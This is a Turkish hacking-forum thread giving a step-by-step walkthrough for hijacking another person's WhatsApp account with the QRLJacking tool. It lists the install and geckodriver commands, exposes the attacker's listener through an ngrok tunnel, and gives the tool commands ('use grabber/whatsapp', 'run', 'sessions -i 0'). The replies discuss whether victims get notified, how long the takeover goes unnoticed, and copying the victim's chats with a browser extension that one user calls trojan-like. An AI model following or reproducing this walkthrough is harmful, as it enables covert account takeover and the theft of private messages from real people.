⭐️WhatsApp Hacking // ["P4RS-By Ghost]

P4RS

Özel Üye
8 Ocak 2017
5,156
57
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere "WhatsApp Hacking" konusunu anlatacağım. Bu Parrot'da çalışmadı Kali'de deneyiniz! Konu da bir bölüm sonrasında fotoğraflarda arkaplan değişik olduğunu göreceksiniz onlar By Ghost'a aittir. Teşekkürler dostum :))

Konu Başlıkları
• QRLJacking Nedir?
• Birlikte WhatsApp Hack'leyelim!



RGQJLC.gif



QRLJacking Nedir?

QRLJacking aracı QR kodu ile giriş yapılan sosyal medya hesaplarını ele geçirmek için üretilmiş sosyal mühendislik aracıdır.

RGQJLC.gif



Birlikte WhatsApp Hack'leyelim!

Öncelikle GitHub adresine gidelim. https://github.com/OWASP/QRLJacking URL'yi kopyalayalım.

hT3TdK.jpg


Ardından terminali açalım ve masaüstüne gelelim bunun için
Kod:
cd Desktop
yazalım ardından aracı indirmek
Kod:
git clone https://github.com/OWASP/QRLJacking
yazalım.

wgxlzU.jpg


Ardından Selenium için gerekli olan geckodriver'ı indireceğiz bunun için de buraya https://github.com/mozilla/geckodriver/releases gidelim ve linux'unuz hangi sürümse ona uygun olanı indirelim.

hkVHGJ.jpg


Ardından .zip dosyasından dosyayı çıkaralım. İlk olarak
Kod:
sudo cp geckodriver /usr/local/share/
dizinine kopyalayalım. Ardından
Kod:
sudo cp geckodriver /usr/local/bin/ 
sudo cp geckodriver /usr/bin/
kısımlarına kopyalayıp terminali kapatalım.

pTgoBn.jpg


Ardından local servisimizi dış ağda kullanmak için Ngrok'u indireceğiz. Bunun için de sitesine gidelim https://ngrok.com.

myetr7.jpg


Kayıt olun ve size uygun sürümü indiriniz.

urdGx1.jpg


Daha sonra ngrok dosyasını çıkartın ve
Kod:
sudo mv ngrok /root
dizinine atınız. Ardından root dizinine giriş yapıp dosyaya yetki veriniz
Kod:
chmod +x ngrok
. Sonra
Kod:
cp ngrok /usr/bin/
dizinine ngrok dosyasını kopyalayalım ve işlemi bitirelim.

NvUV7Q.jpg


Kayıt olduğumuzda bizlere bir key verdi onu aktif hale getirmek için
Kod:
./ngrok authtoken token'i_yazınız.
şeklinde yazınız.

n0M43S.jpg


Ardından masaüstüne gelerek
Kod:
cd QRLJacking/
yazalım, tekrardan
Kod:
cd QRLJacker/
yazalım ve en son olarakta
Kod:
pip3 install -r requirements.txt[/CODE yazarak kurulumu yapalım.

[IMG]https://resmim.net/f/dfBq4G.jpg[/IMG]

Aracımızı çalıştırmak için [CODE]python3 QrlJacker.py
yazalım.

LnMf5P.jpg


Kod:
help
yazdığımız da bizlere komutlarını göstermektedir.

XjEKwH.jpg


Daha sonra
Kod:
show
diyerek exploit'i görelim. Bunu kullanmak için
Kod:
use grabber/whatsapp
yazalım ve
Kod:
options
diyerek ayarlarına bakalım. Burada port'u ve host'u ayarlayacağız bunun için de
Kod:
set port 1337 
set host 0.0.0.0
yazalım

fNJtNE.jpg


Başka bir terminal açarak
Kod:
ngrok http 1337
yazalımç

nJf4jF.jpg


Gördüğünüz gibi ağı açtı ve dinliyoruz.

4OaKpk.jpg


QRLJacker'a gelerek
Kod:
run
diyelim.

WTbTcF.jpg


QR kodu oluşturdu.

yw35km.jpg


Ngrok terminaline gelerek altta beyaz olarak aldığım linke tıklayarak tarayıcıda açalım.

XQik0n.jpg


Bizlere QR kod verdi gördüğünüz gibi. Bunu karşı tarafın telefonunda okutturalım.

JTUmHU.jpg


Gördüğünüz gibi oturum açıldı diyor bizlere ve
Kod:
sessions -i 0
yazdığımız da Firefox'u açarak WhatsApp'a giriş yapacak.

XfnUZo.jpg


Gördüğünüz gibi açıldı.

cU42rW.jpg


f4XPQV.png




Konum bu kadardı arkadaşlar, buradan tekrardan By Ghost'a teşekkür ediyorum :))




 
Son düzenleme:

aliyestero

Üye
30 Ocak 2016
89
1
elinize saglık hocam biz kişinin whatsapına erişim sagladıgımızda kişi bildirim alacak mı peki ?
 

P4RS

Özel Üye
8 Ocak 2017
5,156
57
Ankara
uğraşacağına telden git wp web e okut bitsin yani

Uzaktan yapılıyor bu dediğim.


elinize saglık hocam biz kişinin whatsapına erişim sagladıgımızda kişi bildirim alacak mı peki ?

Herhangi bir bildirim almıyor karşı taraf

Kişinin aktif oturumlar kısmında görünür müyüz ?

Ona dikkat etmedim fakat gözükürsünüz diye düşünüyorum.

Normal qr okutmadan ne farkı var acaba?

Normal qr kod ile kişi kendi hesabına giriyor fakat bu kodu okutursaniz kişi web ile giriş yapıyor ayrıca arka tarafta bizde giriş yapıyoruz.
 

H5N

Yeni üye
10 Şub 2019
17
0
Kocaeli
peki bu whatsappına giriş yaptığımız kişiye "whatsapp web aktif" diye bildirim gidicek mi?
 

By Ghost

Katılımcı Üye
11 Tem 2013
941
2
C:\Linux
peki bu whatsappına giriş yaptığımız kişiye "whatsapp web aktif" diye bildirim gidicek mi?


elinize saglık hocam biz kişinin whatsapına erişim sagladıgımızda kişi bildirim alacak mı peki ?

Bazen üst bildirim düşüyor bazen düşmüyor. Yinede her halukarda WhatsApp Web sekmesinde oturumlarda gözüküyorsunuz.

Ama zaten kişi telefonunu kontrol edene kadar farketmeyecektir bu zaman aralığında google chrome üzerinde Backup WhatsApp Chats adında bir eklenti var. Bu eklenti ile mesajların backup ını alabilirsiniz. Eklenti ne kadar güvenlidir bilemem chrome mağazasında mevcut ve 3.508 kadar kullanıcısı mevcut.
 
Son düzenleme:

aliyestero

Üye
30 Ocak 2016
89
1
Bazen üst bildirim düşüyor bazen düşmüyor. Yinede her halukarda WhatsApp Web sekmesinde oturumlarda gözüküyorsunuz.

Ama zaten kişi telefonunu kontrol edene kadar farketmeyecektir bu zaman aralığında google chrome üzerinde Backup WhatsApp Chats adında bir eklenti var. Bu eklenti ile mesajların backup ını alabilirsiniz. Eklenti ne kadar güvenlidir bilemem chrome mağazasında mevcut ve 3.508 kadar kullanıcısı mevcut.


Hocam daha önce Backup kulandım keylogger tarzı çalışıyor trojen tarzı veri aktarıyor en güzel kısmı ise telefondan ne kadar silersen sil veri aktarmaya devam etmesi
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.